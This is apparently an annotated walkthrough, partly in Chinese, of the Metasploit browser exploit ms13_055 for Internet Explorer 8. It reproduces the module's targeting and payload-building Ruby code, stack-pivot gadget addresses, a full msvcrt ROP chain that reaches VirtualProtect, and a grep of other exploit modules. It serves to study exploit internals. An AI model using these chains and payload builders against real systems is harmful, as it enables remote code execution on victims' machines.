ms13_055 metasploit
111 def get_payload(t)
112 if t['Rop'] == :msvcrt
113 print_status("Using msvcrt ROP")
114 esp_align = "\x81\xc4\x54\xf2\xff\xff"
115 rop_dll = 'msvcrt'
116 opts = {'target'=>'xp'}
117 else
118 print_status("Using JRE ROP")
119 esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120 rop_dll = 'java'
121 opts = {}
122 end
daniel@daniel-mint ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 C4 54 F2 FF FF add esp, 0xFFFFF254
daniel@daniel-mint ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 EC F0 D8 FF FF sub esp, 0xFFFFD8F0
esp_align 是一条调整栈指针 esp 的指令,并不是严格意义上的“对齐”:msvcrt 链使用 `add esp, 0xFFFFF254`,即 esp -= 0xDAC(3500 字节);JRE 链使用 `sub esp, 0xFFFFD8F0`(注释里写的 `sub esp, -10000`),即 esp += 0x2710(10000 字节)。ROP 链把 esp 指到攻击者可控内存之后,这一步一般是为了把 esp 挪到远离 ROP 链/shellcode 的位置,避免 shellcode 自身的 push/call 覆盖尚未执行的数据;具体偏移量取决于各目标的栈/堆布局,需要结合调试器确认。
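# Pick the exploit target for a client from its HTTP User-Agent.
#
# When the user selected a concrete target it is returned unchanged. For the
# 'Automatic' target the "Windows NT x.y" token and the "MSIE n" token are
# extracted from +agent+ and matched by name against the module's Targets
# list ("IE 8 on Windows XP SP3", "IE 8 on Windows 7").
#
# The User-Agent is entirely client-controlled, so this is only a heuristic
# fingerprint: a spoofed or unexpected UA yields nil (per the surrounding
# notes the caller then answers with a 404) rather than a wrong ROP chain.
#
# @param agent [String, nil] raw User-Agent header; may be absent
# @return [Msf::Module::Target, nil] matching target, or nil when the
#   browser/OS pair is not supported
def get_target(agent)
  return target if target.name != 'Automatic'

  # A request without a User-Agent header gives nil; treat it as unsupported
  # instead of letting nil.scan raise NoMethodError.
  ua = agent.to_s

  nt = ua[/Windows NT (\d\.\d)/, 1] || ''
  ie = ua[/MSIE (\d+)/, 1] || ''   # \d+ so "MSIE 10" is not read as "1"
  return nil if nt.empty? || ie.empty?

  # Only OS builds that have a ROP chain in Targets are recognised; anything
  # else (e.g. Vista 6.0, Windows 8 6.2) is unsupported.
  os_name = case nt
            when '5.1' then 'Windows XP SP3'
            when '6.1' then 'Windows 7'
            end
  # Previously an unknown NT version left os_name nil and
  # String#include?(nil) raised TypeError instead of returning nil.
  return nil unless os_name

  ie_name = "IE #{ie}"

  targets.find { |t| t.name.include?(ie_name) && t.name.include?(os_name) }
end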
188 def on_request_uri(cli, request)
189 agent = request.headers['User-Agent']
190 t = get_target(agent)
当远程客户端请求该页面时,on_request_uri 把 HTTP 请求头中的 User-Agent 交给 get_target,后者用正则从中提取 Windows NT 版本号和 MSIE 主版本号,再在 Targets 列表里按名称匹配出对应的目标配置(ROP 链类型、Pivot 与 Align 地址)。注意 User-Agent 完全由客户端控制,这种指纹识别只是启发式的:伪造或不在预期范围内的 UA 只会导致匹配不到目标。
52 'Targets' =>
53 [
54 [ 'Automatic', {} ],
55 [
56 'IE 8 on Windows XP SP3',
57 {
58 'Rop' => :msvcrt,
59 'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
60 'Align' => 0x77c4d801 # add esp, 0x2c; ret
61 }
62 ],
63 [
64 'IE 8 on Windows 7',
65 {
66 'Rop' => :jre,
67 'Pivot' => 0x7c348b05, # xchg eax, esp; ret
68 'Align' => 0x7C3445F8 # add esp, 0x2c; ret
69 }
70 ]
71 ],
当 User-Agent 匹配不到任何目标时 get_target 返回 nil,on_request_uri(此处未完整展示)随后向客户端返回 404 页面,而不会投递 exploit。
# Build the stage delivered to the client for target +t+: a stack-pointer
# adjustment, the encoded payload and 12000 bytes of alpha filler, wrapped
# in the ROP chain that generate_rop_payload selects for the target.
#
# @param t [Msf::Module::Target] target chosen by get_target; its 'Rop' key
#   selects the chain (:msvcrt for XP, anything else uses the JRE chain)
# @return [String] pivot + ROP chain + stage, as built by generate_rop_payload
def get_payload(t)
  use_msvcrt = t['Rop'] == :msvcrt
  print_status(use_msvcrt ? "Using msvcrt ROP" : "Using JRE ROP")

  # First instruction executed after the ROP chain: moves esp before the
  # shellcode runs. msvcrt: add esp, 0xFFFFF254 (esp -= 0xDAC);
  # JRE: sub esp, 0xFFFFD8F0, i.e. sub esp, -10000 (esp += 0x2710).
  esp_align = use_msvcrt ? "\x81\xc4\x54\xf2\xff\xff" : "\x81\xEC\xF0\xD8\xFF\xFF"
  rop_dll   = use_msvcrt ? 'msvcrt' : 'java'
  opts      = use_msvcrt ? {'target'=>'xp'} : {}

  # Trailing alpha filler after the shellcode; size inherited from the module.
  stage = esp_align + payload.encoded + rand_text_alpha(12000)
  generate_rop_payload(rop_dll, stage, opts)
end
generate_rop_payload
# Assemble pivot + ROP chain + payload for the named ROP module.
#
# The chain returned by select_rop may contain placeholder symbols, resolved
# here before packing:
#   :nop                -> one dword of NOP sled (opts['nop'], else 0x90909090)
#   :junk               -> a random dword that avoids opts['badchars']
#   :size               -> payload.length
#   :unsafe_negate_size -> get_unsafe_size(payload.length)
#   :safe_negate_size   -> get_safe_size(payload.length)
# Every other element is packed as a little-endian 32-bit value.
#
# @param rop [String] ROP module name (e.g. 'msvcrt', 'java', 'hxds')
# @param payload [String] bytes appended after the chain
# @param opts [Hash] optional 'nop', 'badchars', 'pivot', 'target', 'base'
# @return [String] opts['pivot'] + packed chain + payload
# @raise [RuntimeError] when the selected chain packs to an empty string
def generate_rop_payload(rop, payload, opts={})
  nop      = opts['nop'] || nil
  badchars = opts['badchars'] || ''
  pivot    = opts['pivot'] || ''
  target   = opts['target'] || ''
  base     = opts['base'] || nil

  gadgets = select_rop(rop, {'target'=>target, 'base'=>base})

  # Swap the reserved words for concrete dwords.
  dwords = gadgets.map do |g|
    case g
    when :nop
      nop ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
    when :junk
      Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
    when :size
      payload.length
    when :unsafe_negate_size
      get_unsafe_size(payload.length)
    when :safe_negate_size
      get_safe_size(payload.length)
    else
      g
    end
  end
  chain = dwords.pack("V*")

  raise RuntimeError, "No ROP chain generated successfully" if chain.empty?

  pivot + chain + payload
end
select_rop(此处未展示)会按 ROP 名称和 target 从 data 目录下预定义的 [module].xml 中选出 gadget 列表;generate_rop_payload 再把列表里的保留字(:nop、:junk、:size、:safe_negate_size、:unsafe_negate_size)替换成实际的 dword,用 pack("V*") 打包成小端序字节串,最后按 pivot + ROP 链 + payload 的顺序拼接返回;若打包后的 ROP 链为空则抛出 RuntimeError。
3 <rop>
4 <compatibility>
5 <target>WINDOWS XP SP2</target>
6 <target>WINDOWS XP SP3</target>
7 </compatibility>
8
9 <gadgets base="0x77c10000">
10 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
11 <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
12 <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
13 <gadget value="junk">JUNK</gadget>
14 <gadget offset="0x0001362c">POP EBX # RETN</gadget>
15 <gadget offset="0x0004d9bb">Writable location</gadget>
16 <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
17 <gadget offset="0x00040d13">POP EDX # RETN</gadget>
18 <gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
19 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
20 <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
21 <gadget value="junk">JUNK</gadget>
22 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
23 <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
24 <gadget offset="0x0002ee15">skip 4 bytes</gadget>
25 <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
26 <gadget offset="0x0004d9bb">Writable location</gadget>
27 <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
28 <gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
29 <gadget offset="0x0002a184">POP ESI # RETN</gadget>
30 <gadget offset="0x0001aacc">JMP [EAX]</gadget>
31 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
32 <gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
33 <gadget offset="0x00002df9">PUSHAD # RETN</gadget>
34 <gadget offset="0x00025459">ptr to 'push esp # ret</gadget>
35 </gadgets>
36 </rop>
用 grep 查看 windows/browser 目录下还有哪些浏览器 exploit 模块调用了 generate_rop_payload(以及各自使用的 ROP 模块名和 target):
daniel@daniel-mint ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -n
adobe_flash_mp4_cprt.rb:148: code = generate_rop_payload(rop_name, code, {'target'=>rop_target})
adobe_flash_otf_font.rb:100: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot})
adobe_flash_otf_font.rb:110: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot})
adobe_flash_otf_font.rb:120: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.268', 'pivot'=>pivot})
adobe_flash_otf_font.rb:130: p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
adobe_flashplayer_flash10o.rb:194: p = generate_rop_payload('java', payload.encoded)
adobe_flash_rtmp.rb:135: code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})
adobe_toolbutton.rb:77: rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
adobe_toolbutton.rb:78: rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
aladdin_choosefilepath_bof.rb:147: p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'})
apple_quicktime_mime_type.rb:153: code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
apple_quicktime_rdrf.rb:65: p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
crystal_reports_printcontrol.rb:178: rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")})
hp_loadrunner_writefilebinary.rb:207: rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
ie_cbutton_uaf.rb:148: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
ie_cbutton_uaf.rb:150: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
ie_cbutton_uaf.rb:153: rop_payload = generate_rop_payload('java', java_align + code)
ie_cgenericelement_uaf.rb:126: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
ie_cgenericelement_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
ie_cgenericelement_uaf.rb:136: rop_payload = generate_rop_payload('java', code)
ie_execcommand_uaf.rb:139: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
ie_execcommand_uaf.rb:158: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ie_setmousecapture_uaf.rb:98: rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })
ie_setmousecapture_uaf.rb:112: rop = generate_rop_payload('hxds', code, { 'target'=>'2010' })
indusoft_issymbol_internationalseparator.rb:219: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
indusoft_issymbol_internationalseparator.rb:231: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
inotes_dwa85w_bof.rb:204: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'})
mozilla_firefox_onreadystatechange.rb:108: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
mozilla_firefox_xmlserializer.rb:110: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
ms10_002_ie_object.rb:248: rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'})
ms10_002_ie_object.rb:250: rop_payload = generate_rop_payload('java', p)
ms11_050_mshtml_cobjectelement.rb:182: rop_payload = generate_rop_payload('java', p)
ms11_081_option.rb:137: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms11_081_option.rb:144: rop_payload = generate_rop_payload('java', '')
ms12_004_midi.rb:519: generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'})
ms12_037_same_id.rb:133: rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot})
ms12_037_same_id.rb:137: rop = generate_rop_payload('java', '', {'pivot'=>pivot})
ms13_009_ie_slayoutrun_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms13_037_svg_dashstyle.rb:218: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_055_canchor.rb:125: generate_rop_payload(rop_dll, p, opts)
ms13_059_cflatmarkuppointer.rb:120: generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_069_caret.rb:97: p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
ms13_080_cdisplaypointer.rb:157: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:174: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:186: rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:197: rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
ms13_090_cardspacesigninhelper.rb:108: rop_payload = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp', 'pivot' => stack_pivot})
ms14_012_textrange.rb:85: p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
msxml_get_definition_code_exec.rb:189: rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
msxml_get_definition_code_exec.rb:193: rop = generate_rop_payload('java','',{'pivot'=>adjust})
novell_groupwise_gwcls1_actvx.rb:207: rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea
novell_groupwise_gwcls1_actvx.rb:217: rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
ntr_activex_check_bof.rb:270: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})
ntr_activex_check_bof.rb:274: rop_payload = generate_rop_payload('java', code)
quickr_qp2_bof.rb:202: rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
siemens_solid_edge_selistctrlx.rb:398: return generate_rop_payload('msvcrt', payload.encoded, {'pivot'=> fake_memory, 'target'=>'xp'})
vlc_amv.rb:143: code = generate_rop_payload('java', payload.encoded)